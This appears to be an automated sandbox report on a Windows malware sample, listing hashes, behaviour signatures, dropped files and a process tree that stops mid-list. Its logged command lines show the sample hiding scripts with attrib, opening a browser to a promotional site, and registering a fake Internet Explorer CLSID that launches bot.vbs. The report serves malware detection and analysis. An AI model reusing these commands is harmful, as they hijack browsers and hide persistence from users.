Analysis

- max time kernel: 94s
- max time network: 113s
- platform: windows10-2004_x64
- resource: win10v2004-20241007-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 07/11/2024, 21:30

Static task: static1

Behavioral task: behavioral1
- Sample: e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe
- Resource: win7-20241010-en

Behavioral task: behavioral2
- Sample: e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe
- Resource: win10v2004-20241007-en
General

- Target: e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe
- Size: 248KB
- MD5: 7c759a5d3efcb36c467e1e9184c5dd40
- SHA1: 24c37c209fef4eb36f6dcebbe8d39d924b31a041
- SHA256: e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975
- SHA512: 54ff64749a60b378fe931bc74e00f31e63c2542e8c70be9abc843d1831faf4520be35ed93ee34276ca65903fd921bc036448ba7f4abc2bdf30653952b1dcd5d7
- SSDEEP: 6144:Fu2urzh9xu/XkauF5JgmbuaufWG7JbvTsCIq6G7Gfwtq:Futrzh9xOXkWmnufWG7lhP74f
Malware Config
Signatures

Creates new service(s) (2 TTPs)

Sets file to hidden (1 TTP, 3 IoCs)
Modifies file attributes to stop it showing in Explorer etc.
pid | Process
- 3572 | attrib.exe
- 1732 | attrib.exe
- 2756 | attrib.exe
Checks computer location settings (2 TTPs, 4 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
- Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe
- Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | WScript.exe
- Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | cmd.exe
- Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | msn.exe
Executes dropped EXE (4 IoCs)
pid | Process
- 4292 | msn.exe
- 4884 | ar2.exe
- 3800 | ar2.exe
- 4108 | ar2.exe
Indicator Removal: File Deletion (1 TTP)
Adversaries may delete files left behind by the actions of their intrusion activity.
Drops file in Program Files directory (64 IoCs)
In this list, [sample] stands for e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe.
description | ioc | Process
- File opened for modification | C:\Program Files\Kingsoft\myfile\36O安全浏览器 3.lnk | [sample]
- File created | C:\Program Files\Kingsoft\myfile\runonce.cmd | [sample]
- File opened for modification | C:\Program Files\Kingsoft\myfile\tool.cmd | [sample]
- File opened for modification | C:\Program Files\Kingsoft\myfile\se1.vbs | [sample]
- File created | C:\Program Files\Kingsoft\myfile\Microsoft\bot.vbs | [sample]
- File opened for modification | C:\Program Files\Kingsoft\myfile\fav | [sample]
- File created | C:\Program Files\Kingsoft\myfile\starts.vbs | [sample]
- File opened for modification | C:\Program Files\Kingsoft\myfile\fav\fav.cmd | [sample]
- File opened for modification | C:\Program Files\Kingsoft\myfile\fav\淘宝购物.url | [sample]
- File opened for modification | C:\Program Files\Kingsoft\myfile\36O安全浏览器 3.lnk | [sample]
- File opened for modification | C:\Program Files\Kingsoft\myfile\soft | [sample]
- File created | C:\Program Files\Kingsoft\myfile\cpa.cmd | [sample]
- File opened for modification | C:\Program Files\Kingsoft\myfile\fav\网址导航.url | [sample]
- File created | C:\Program Files\Kingsoft\myfile\fav\软件下载.url | [sample]
- File opened for modification | C:\Program Files\Kingsoft\myfile\fav\软件下载.url | [sample]
- File opened for modification | C:\Program Files\Kingsoft\myfile\soft\msn.exe | [sample]
- File created | C:\Program Files\Windows NT\se1.vbs | cmd.exe
- File opened for modification | C:\Program Files\Kingsoft\myfile\fav\fav.vbs | [sample]
- File opened for modification | C:\Program Files\Kingsoft\myfile\Internet Expl0rer.lnk | [sample]
- File created | C:\Program Files\Kingsoft\myfile\file.vbs | [sample]
- File created | C:\Program Files\Kingsoft\myfile\360.cmd | [sample]
- File opened for modification | C:\Program Files\xerox\tao.ico | cmd.exe
- File created | C:\Program Files\Kingsoft\myfile\se.vbs | [sample]
- File opened for modification | C:\Program Files\Kingsoft\myfile\Microsoft | [sample]
- File created | C:\Program Files\Kingsoft\myfile\fav\网址导航.url | [sample]
- File opened for modification | C:\Program Files\Kingsoft\myfile\file.vbs | [sample]
- File opened for modification | C:\Program Files\Kingsoft\myfile\tool.cmd | attrib.exe
- File opened for modification | C:\Program Files\Kingsoft\myfile\open.vbs | [sample]
- File opened for modification | C:\Program Files\Kingsoft\myfile\fav\fav.lnk | [sample]
- File opened for modification | C:\Program Files\Kingsoft\myfile\360.cmd | [sample]
- File opened for modification | C:\Program Files\Kingsoft\myfile\361.cmd | [sample]
- File created | C:\Program Files\Windows NT\se.vbs | cmd.exe
- File created | C:\Program Files\Kingsoft\myfile\fav\tao.ico | [sample]
- File created | C:\Program Files\Kingsoft\myfile\36O安全浏览器 3.lnk | [sample]
- File created | C:\Program Files\Kingsoft\myfile\tools.lnk | [sample]
- File opened for modification | C:\Program Files\Kingsoft\myfile\dodo.vbs | [sample]
- File opened for modification | C:\Program Files\Kingsoft\myfile\安全工具.vbs | [sample]
- File created | C:\Program Files\Kingsoft\myfile\__tmp_rar_sfx_access_check_240626921 | [sample]
- File opened for modification | C:\Program Files\Kingsoft\myfile\se.vbs | [sample]
- File opened for modification | C:\Program Files\Kingsoft\myfile\runonce.cmd | [sample]
- File opened for modification | C:\Program Files\Kingsoft\myfile\cpa.cmd | [sample]
- File created | C:\Program Files\Kingsoft\myfile\361.cmd | [sample]
- File created | C:\Program Files\Kingsoft\myfile\dodo.vbs | [sample]
- File created | C:\Program Files\xerox\tao.ico | cmd.exe
- File opened for modification | C:\Program Files\Kingsoft | [sample]
- File created | C:\Program Files\Kingsoft\myfile\open.vbs | [sample]
- File opened for modification | C:\Program Files\Kingsoft\myfile\fav\tao.ico | [sample]
- File opened for modification | C:\Program Files\Kingsoft\myfile\fav\tao2.ico | [sample]
- File opened for modification | C:\Program Files\Windows NT\se.vbs | cmd.exe
- File opened for modification | C:\Program Files\Kingsoft\myfile\Microsoft\bot.vbs | [sample]
- File opened for modification | C:\Program Files\Kingsoft\myfile\starts.vbs | [sample]
- File created | C:\Program Files\Kingsoft\myfile\soft\msn.exe | [sample]
- File opened for modification | C:\Program Files\Windows NT\se1.vbs | cmd.exe
- File created | C:\Program Files\Kingsoft\myfile\fav\fav.lnk | [sample]
- File created | C:\Program Files\Kingsoft\myfile\fav\tao2.ico | [sample]
- File created | C:\Program Files\Kingsoft\myfile\fav\淘宝购物.url | [sample]
- File opened for modification | C:\Program Files\Kingsoft\myfile\tools.lnk | [sample]
- File created | C:\Program Files\Kingsoft\myfile\安全工具.vbs | [sample]
- File opened for modification | C:\Program Files\Kingsoft\myfile | [sample]
- File created | C:\Program Files\Kingsoft\myfile\Internet Expl0rer.lnk | [sample]
- File created | C:\Program Files\Kingsoft\myfile\36O安全浏览器 3.lnk | [sample]
- File opened for modification | C:\Program Files\Kingsoft\myfile\Microsoft\bot.vbs | attrib.exe
- File created | C:\Program Files\Kingsoft\myfile\tool.cmd | [sample]
- File created | C:\Program Files\Kingsoft\myfile\se1.vbs | [sample]
Launches sc.exe (2 IoCs)
Sc.exe is a Windows utility to control services on the system.
pid | Process
- 2440 | sc.exe
- 1264 | sc.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTP, 50 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
All 50 IoCs are "Key opened" events on the same key, \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language; grouped by the process that opened it:
Process | Key opened (count)
- reg.exe | 23
- cmd.exe | 7
- at.exe | 6
- ar2.exe | 3
- attrib.exe | 3
- sc.exe | 2
- e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe | 1
- IEXPLORE.EXE | 1
- msn.exe | 1
- WScript.exe | 1
- net.exe | 1
- net1.exe | 1
System Service Discovery (1 TTP, 3 IoCs)
Adversaries may try to gather information about registered local system services.
pid | Process
- 2440 | sc.exe
- 4828 | net.exe
- 3616 | net1.exe
Modifies Internet Explorer settings
In this list, HKU_SID stands for \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000.
description | ioc | Process
- Set value (int) | HKU_SID\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31142236" | IEXPLORE.EXE
- Set value (data) | HKU_SID\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a43d217a0cb97a4db769f976d8642e3900000000020000000000106600000001000020000000d95c69122c8541d3d5734b33ee2c73b3199972c1b000734a881642e5c167e6d1000000000e8000000002000020000000124ea807d3e5498e25be90fa5f9f06c2425e5e08a89da6866c2de831413107ba2000000075b32362eab0a167a00516677ecd1815e6b69b1c6d41dcd7891a24f9cd5451ae400000004800225125246914b43ab318bd56f3d20580d8ed767c3e9ba17348ecf15d679a31893afa9e2c0ce4acd4bbfaf9627fb3826c10773a5325fa8fcc46177215efd0 | iexplore.exe
- Set value (str) | HKU_SID\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | iexplore.exe
- Key created | HKU_SID\Software\Microsoft\Internet Explorer\VersionManager | IEXPLORE.EXE
- Set value (str) | HKU_SID\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" | iexplore.exe
- Key created | HKU_SID\Software\Microsoft\Internet Explorer\Main | IEXPLORE.EXE
- Key created | HKU_SID\Software\Microsoft\Internet Explorer\GPU | IEXPLORE.EXE
- Set value (int) | HKU_SID\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31142236" | iexplore.exe
- Set value (int) | HKU_SID\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" | iexplore.exe
- Set value (int) | HKU_SID\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31142236" | IEXPLORE.EXE
- Set value (int) | HKU_SID\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | iexplore.exe
- Key created | HKU_SID\Software\Microsoft\Internet Explorer\Recovery\AdminActive | iexplore.exe
- Key created | HKU_SID\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | iexplore.exe
- Key created | HKU_SID\Software\Microsoft\Internet Explorer\TabbedBrowsing | iexplore.exe
- Set value (data) | HKU_SID\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30d410675c31db01 | iexplore.exe
- Set value (int) | HKU_SID\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1712909909" | IEXPLORE.EXE
- Set value (int) | HKU_SID\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | iexplore.exe
- Set value (data) | HKU_SID\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a43d217a0cb97a4db769f976d8642e3900000000020000000000106600000001000020000000a151198040e7728ff4d08b878b3ceba851d35e0ad628ef4d5729477ccc7f0303000000000e8000000002000020000000980078381d2d5506e2c9b78377233c9bcbfbfcce47997a1deb8baf7e3fbb7495200000005c937bc29cb5091fdb88a73085103054b52b18f4c7f7119c7ad3de1f19421d8740000000ef485b24ba2f988799828c2a083e2010de15a2f39936ae3cd8a815ac68e50debd495aaf33e4a6c3f9987a316b04dd96582a6dfb3ad88bb30e0f9423c84077108 | iexplore.exe
- Key created | HKU_SID\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion | iexplore.exe
- Key created | HKU_SID\Software\Microsoft\Internet Explorer\Main | iexplore.exe
- Set value (int) | HKU_SID\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{9195284E-9D4F-11EF-ADF2-5227CD58F2D9} = "0" | iexplore.exe
- Set value (data) | HKU_SID\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 200018675c31db01 | iexplore.exe
- Key created | HKU_SID\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | iexplore.exe
- Set value (str) | HKU_SID\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" | IEXPLORE.EXE
- Set value (int) | HKU_SID\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" | iexplore.exe
- Set value (int) | HKU_SID\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1710878674" | iexplore.exe
- Set value (int) | HKU_SID\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31142236" | iexplore.exe
- Key created | HKU_SID\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames | iexplore.exe
- Set value (int) | HKU_SID\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | iexplore.exe
- Key created | HKU_SID\Software\Microsoft\Internet Explorer\VersionManager | iexplore.exe
- Set value (int) | HKU_SID\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1712909909" | IEXPLORE.EXE
- Set value (int) | HKU_SID\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "437780028" | iexplore.exe
- Key created | HKU_SID\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | iexplore.exe
- Set value (str) | HKU_SID\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | iexplore.exe
- Key created | HKU_SID\Software\Microsoft\Internet Explorer\DomainSuggestion | iexplore.exe
- Key created | HKU_SID\Software\Microsoft\Internet Explorer\Main\WindowsSearch | iexplore.exe
- Set value (data) | HKU_SID\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000 | iexplore.exe
- Set value (int) | HKU_SID\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1710878674" | iexplore.exe
- Key created | HKU_SID\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | iexplore.exe
Modifies registry class (45 IoCs)
In this list, CLSID_KEY stands for \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}. The shell verb names are reproduced exactly as the sandbox recorded them.
description | ioc | Process
- Key created | CLSID_KEY | reg.exe
- Key created | CLSID_KEY\shell\┤≥┐¬╓≈╥│(&H) | reg.exe
- Key created | CLSID_KEY\shell\┤≥┐¬╓≈╥│(&H)\Command | reg.exe
- Set value (str) | CLSID_KEY\shell\╩⌠╨╘(&R)\Command\ | reg.exe
- Key created | CLSID_KEY\shell\╩⌠╨╘(&R)\Command | reg.exe
- Set value (int) | CLSID_KEY\ShellFolder\Attributes = "0" | reg.exe
- Set value (str) | CLSID_KEY\InfoTip = "@shdoclc.dll,-880" | reg.exe
- Set value (str) | CLSID_KEY\LocalizedString = "@shdoclc.dll,-880" | reg.exe
- Key created | CLSID_KEY\DefaultIcon | reg.exe
- Set value (str) | CLSID_KEY\DefaultIcon\ | reg.exe
- Set value (str) | CLSID_KEY\shell\ | reg.exe
- Set value (str) | CLSID_KEY\shell\ = "┤≥┐¬╓≈╥│(&H)" | reg.exe
- Set value (str) | CLSID_KEY\shell\┤≥┐¬╓≈╥│(&H)\ | reg.exe
- Set value (str) | CLSID_KEY\shell\┤≥┐¬╓≈╥│(&H)\MUIVerb = "@shdoclc.dll,-10241" | reg.exe
- Set value (str) | CLSID_KEY\ | reg.exe
- Set value (str) | CLSID_KEY\InProcServer32\ThreadingModel = "Apartment" | reg.exe
- Key created | CLSID_KEY\DefaultIcon | reg.exe
- Set value (str) | CLSID_KEY\DefaultIcon\ = "shdoclc.dll,0" | reg.exe
- Set value (str) | CLSID_KEY\InProcServer32\ | reg.exe
- Set value (str) | CLSID_KEY\InProcServer32\ = "%systemRoot%\\SysWow64\\shdocvw.dll" | reg.exe
- Key created | CLSID_KEY\shell\╩⌠╨╘(&R)\Command | reg.exe
- Key created | CLSID_KEY\ShellFolder | reg.exe
- Key created | CLSID_KEY\ShellFolder | reg.exe
- Key created | CLSID_KEY\ShellFolder | reg.exe
- Key created | CLSID_KEY\ShellFolder | reg.exe
- Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings | e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe
- Key created | CLSID_KEY | reg.exe
- Key created | CLSID_KEY\InProcServer32 | reg.exe
- Key created | CLSID_KEY\shell\┤≥┐¬╓≈╥│(&H) | reg.exe
- Set value (str) | CLSID_KEY\shell\┤≥┐¬╓≈╥│(&H)\Command\ = "wscript.exe c:\\progra~1\\Kingsoft\\myfile\\Microsoft\\bot.vbs" | reg.exe
- Key created | CLSID_KEY\ShellFolder | reg.exe
- Set value (str) | CLSID_KEY\ShellFolder\WantsParsDisplayName | reg.exe
- Key created | CLSID_KEY | reg.exe
- Key created | CLSID_KEY\shell | reg.exe
- Set value (str) | CLSID_KEY\shell\┤≥┐¬╓≈╥│(&H)\Command\ | reg.exe
- Set value (str) | CLSID_KEY\shell\╩⌠╨╘(&R)\Command\ = "rundll32.exe shell32.dll,Control_RunDLL INETCPL.CPL,,0" | reg.exe
- Set value (str) | CLSID_KEY\ShellFolder\ | reg.exe
- Set value (str) | CLSID_KEY\ShellFolder\HideOnDesktopPerUser | reg.exe
- Key created | CLSID_KEY\shell | reg.exe
- Key created | CLSID_KEY\shell\╩⌠╨╘(&R) | reg.exe
- Set value (str) | CLSID_KEY\ShellFolder\HideFolderVerbs | reg.exe
- Key created | CLSID_KEY\InProcServer32 | reg.exe
- Key created | CLSID_KEY\InProcServer32 | reg.exe
- Key created | CLSID_KEY\shell\┤≥┐¬╓≈╥│(&H)\Command | reg.exe
- Set value (str) | CLSID_KEY\shell\╩⌠╨╘(&R)\ | reg.exe
Runs net.exe
-
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4956 iexplore.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
pid Process 4956 iexplore.exe 4956 iexplore.exe 548 IEXPLORE.EXE 548 IEXPLORE.EXE 4884 ar2.exe 4884 ar2.exe 4884 ar2.exe 3800 ar2.exe 3800 ar2.exe 3800 ar2.exe 4108 ar2.exe 4108 ar2.exe 4108 ar2.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3204 wrote to memory of 4140 3204 e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe 86 PID 3204 wrote to memory of 4140 3204 e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe 86 PID 3204 wrote to memory of 4140 3204 e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe 86 PID 4140 wrote to memory of 4460 4140 WScript.exe 88 PID 4140 wrote to memory of 4460 4140 WScript.exe 88 PID 4140 wrote to memory of 4460 4140 WScript.exe 88 PID 4460 wrote to memory of 4956 4460 cmd.exe 90 PID 4460 wrote to memory of 4956 4460 cmd.exe 90 PID 4140 wrote to memory of 3820 4140 WScript.exe 92 PID 4140 wrote to memory of 3820 4140 WScript.exe 92 PID 4140 wrote to memory of 3820 4140 WScript.exe 92 PID 3820 wrote to memory of 3572 3820 cmd.exe 94 PID 3820 wrote to memory of 3572 3820 cmd.exe 94 PID 3820 wrote to memory of 3572 3820 cmd.exe 94 PID 3820 wrote to memory of 1732 3820 cmd.exe 95 PID 3820 wrote to memory of 1732 3820 cmd.exe 95 PID 3820 wrote to memory of 1732 3820 cmd.exe 95 PID 4956 wrote to memory of 548 4956 iexplore.exe 96 PID 4956 wrote to memory of 548 4956 iexplore.exe 96 PID 4956 wrote to memory of 548 4956 iexplore.exe 96 PID 3820 wrote to memory of 2756 3820 cmd.exe 97 PID 3820 wrote to memory of 2756 3820 cmd.exe 97 PID 3820 wrote to memory of 2756 3820 cmd.exe 97 PID 3820 wrote to memory of 3428 3820 cmd.exe 98 PID 3820 wrote to memory of 3428 3820 cmd.exe 98 PID 3820 wrote to memory of 3428 3820 cmd.exe 98 PID 3820 wrote to memory of 4328 3820 cmd.exe 99 PID 3820 wrote to memory of 4328 3820 cmd.exe 99 PID 3820 wrote to memory of 4328 3820 cmd.exe 99 PID 3820 wrote to memory of 824 3820 cmd.exe 100 PID 3820 wrote to memory of 824 3820 cmd.exe 100 PID 3820 wrote to memory of 824 3820 cmd.exe 100 PID 3820 wrote to memory of 4992 3820 cmd.exe 101 PID 3820 wrote to memory of 4992 3820 cmd.exe 101 PID 3820 wrote to memory of 4992 3820 cmd.exe 101 PID 3820 wrote to 
memory of 4596 3820 cmd.exe 102 PID 3820 wrote to memory of 4596 3820 cmd.exe 102 PID 3820 wrote to memory of 4596 3820 cmd.exe 102 PID 3820 wrote to memory of 3104 3820 cmd.exe 103 PID 3820 wrote to memory of 3104 3820 cmd.exe 103 PID 3820 wrote to memory of 3104 3820 cmd.exe 103 PID 3820 wrote to memory of 2744 3820 cmd.exe 104 PID 3820 wrote to memory of 2744 3820 cmd.exe 104 PID 3820 wrote to memory of 2744 3820 cmd.exe 104 PID 3820 wrote to memory of 4856 3820 cmd.exe 105 PID 3820 wrote to memory of 4856 3820 cmd.exe 105 PID 3820 wrote to memory of 4856 3820 cmd.exe 105 PID 3820 wrote to memory of 2204 3820 cmd.exe 106 PID 3820 wrote to memory of 2204 3820 cmd.exe 106 PID 3820 wrote to memory of 2204 3820 cmd.exe 106 PID 3820 wrote to memory of 3868 3820 cmd.exe 107 PID 3820 wrote to memory of 3868 3820 cmd.exe 107 PID 3820 wrote to memory of 3868 3820 cmd.exe 107 PID 3820 wrote to memory of 2132 3820 cmd.exe 108 PID 3820 wrote to memory of 2132 3820 cmd.exe 108 PID 3820 wrote to memory of 2132 3820 cmd.exe 108 PID 3820 wrote to memory of 1096 3820 cmd.exe 109 PID 3820 wrote to memory of 1096 3820 cmd.exe 109 PID 3820 wrote to memory of 1096 3820 cmd.exe 109 PID 3820 wrote to memory of 1008 3820 cmd.exe 110 PID 3820 wrote to memory of 1008 3820 cmd.exe 110 PID 3820 wrote to memory of 1008 3820 cmd.exe 110 PID 3820 wrote to memory of 440 3820 cmd.exe 111 PID 3820 wrote to memory of 440 3820 cmd.exe 111 -
Views/modifies file attributes 1 TTPs 3 IoCs
pid | Process
3572 | attrib.exe
1732 | attrib.exe
2756 | attrib.exe
Processes
C:\Users\Admin\AppData\Local\Temp\e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe"
  - Checks computer location settings
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID: 3204

    C:\Windows\SysWOW64\WScript.exe
      Command line: "C:\Windows\System32\WScript.exe" "C:\Program Files\Kingsoft\myfile\file.vbs"
      - Checks computer location settings
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      PID: 4140

        C:\Windows\SysWOW64\cmd.exe
          Command line: "C:\Windows\System32\cmd.exe" /C start /min iexplore http://www.dao666.com/index2.html?ha
          - Checks computer location settings
          - System Location Discovery: System Language Discovery
          - Suspicious use of WriteProcessMemory
          PID: 4460

            C:\Program Files\Internet Explorer\iexplore.exe
              Command line: "C:\Program Files\Internet Explorer\iexplore.exe" http://www.dao666.com/index2.html?ha
              - Modifies Internet Explorer settings
              - Suspicious use of FindShellTrayWindow
              - Suspicious use of SetWindowsHookEx
              - Suspicious use of WriteProcessMemory
              PID: 4956

                C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4956 CREDAT:17410 /prefetch:2
                  - System Location Discovery: System Language Discovery
                  - Modifies Internet Explorer settings
                  - Suspicious use of SetWindowsHookEx
                  PID: 548

        C:\Windows\SysWOW64\cmd.exe
          Command line: "C:\Windows\System32\cmd.exe" /C .\tool.cmd
          - System Location Discovery: System Language Discovery
          - Suspicious use of WriteProcessMemory
          PID: 3820

            C:\Windows\SysWOW64\attrib.exe
              Command line: attrib +r +h +s ".\Microsoft\bot.vbs"
              - Sets file to hidden
              - Drops file in Program Files directory
              - System Location Discovery: System Language Discovery
              - Views/modifies file attributes
              PID: 3572

            C:\Windows\SysWOW64\attrib.exe
              Command line: attrib +r +h +s ".\tool.cmd"
              - Sets file to hidden
              - Drops file in Program Files directory
              - System Location Discovery: System Language Discovery
              - Views/modifies file attributes
              PID: 1732

            C:\Windows\SysWOW64\attrib.exe
              Command line: attrib +r +h +s ".\open.vbs"
              - Sets file to hidden
              - System Location Discovery: System Language Discovery
              - Views/modifies file attributes
              PID: 2756

            C:\Windows\SysWOW64\reg.exe
              Command line: REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f
              - System Location Discovery: System Language Discovery
              PID: 3428

            C:\Windows\SysWOW64\reg.exe
              Command line: REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}"
              - System Location Discovery: System Language Discovery
              - Modifies registry class
              PID: 4328

            C:\Windows\SysWOW64\reg.exe
              Command line: REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}" /v "InfoTip" /t REG_SZ /d "@shdoclc.dll,-880" /f
              - System Location Discovery: System Language Discovery
              - Modifies registry class
              PID: 824

            C:\Windows\SysWOW64\reg.exe
              Command line: REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}" /v "LocalizedString" /t REG_SZ /d "@shdoclc.dll,-880" /f
              - System Location Discovery: System Language Discovery
              - Modifies registry class
              PID: 4992

            C:\Windows\SysWOW64\reg.exe
              Command line: REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon"
              - System Location Discovery: System Language Discovery
              - Modifies registry class
              PID: 4596

            C:\Windows\SysWOW64\reg.exe
              Command line: REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f
              - System Location Discovery: System Language Discovery
              - Modifies registry class
              PID: 3104

            C:\Windows\SysWOW64\reg.exe
              Command line: REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32"
              - System Location Discovery: System Language Discovery
              - Modifies registry class
              PID: 2744

            C:\Windows\SysWOW64\reg.exe
              Command line: REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f
              - System Location Discovery: System Language Discovery
              - Modifies registry class
              PID: 4856

            C:\Windows\SysWOW64\reg.exe
              Command line: REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f
              - System Location Discovery: System Language Discovery
              - Modifies registry class
              PID: 2204

            C:\Windows\SysWOW64\reg.exe
              Command line: REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell"
              - System Location Discovery: System Language Discovery
              - Modifies registry class
              PID: 3868

            C:\Windows\SysWOW64\reg.exe
              Command line: REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f
              - System Location Discovery: System Language Discovery
              - Modifies registry class
              PID: 2132

            C:\Windows\SysWOW64\reg.exe
              Command line: REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)"
              - System Location Discovery: System Language Discovery
              - Modifies registry class
              PID: 1096

            C:\Windows\SysWOW64\reg.exe
              Command line: REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f
              - System Location Discovery: System Language Discovery
              - Modifies registry class
              PID: 1008

            C:\Windows\SysWOW64\reg.exe
              Command line: REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command"
              - System Location Discovery: System Language Discovery
              - Modifies registry class
              PID: 440

            C:\Windows\SysWOW64\reg.exe
